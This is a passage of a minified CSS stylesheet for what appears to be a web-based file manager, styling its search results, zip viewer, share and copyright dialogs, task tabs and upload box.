#1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.pathinfo .download-url{margin-right:0;border-radius:3px 0 0 3px;}.file-drag-upload .aui-content{overflow-y:scroll;}.fileupload{padding-left:25px;}.fileupload span.status{padding-left:10px;font-size:10px;color:#f96;}.movie-player-dialog{overflow:hidden;}.flash-player{width:100%;height:100%;}.wmp-player{width:0%;height:0%;}.movie-player-dialog .aui-content{background:#000;}.dialog-path-remove .aui-content{word-wrap:break-word;width:auto;}.server-dwonload-textarea textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.server-dwonload-textarea textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.file-upload-box{height:385px;padding:5px;min-width:365px;overflow:hidden;}.file-upload-box .topbar-nav{border-bottom:1px solid #ddd;margin-top:6px;}.file-upload-box .menu{display:block;text-decoration:none;float:left;padding:0px 15px;height:26px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fff,#eee);background-image:-moz-linear-gradient(top,#fff,#eee);background-image:-o-linear-gradient(top,#fff,#eee);background-image:-ms-linear-gradient(top,#fff,#eee);background-image:linear-gradient(top,#fff,#eee);-pie-background:linear-gradient(to top,#fff,#eee);font-size:1em;border:1px solid #ccc;text-align:center;line-height:24px;margin-right:5px;margin-bottom:-1px;color:#444;border-radius:4px 4px 0 0;}.file-upload-box .menu.this{background:#fff;border-bottom:1px solid #fff;}.file-upload-box 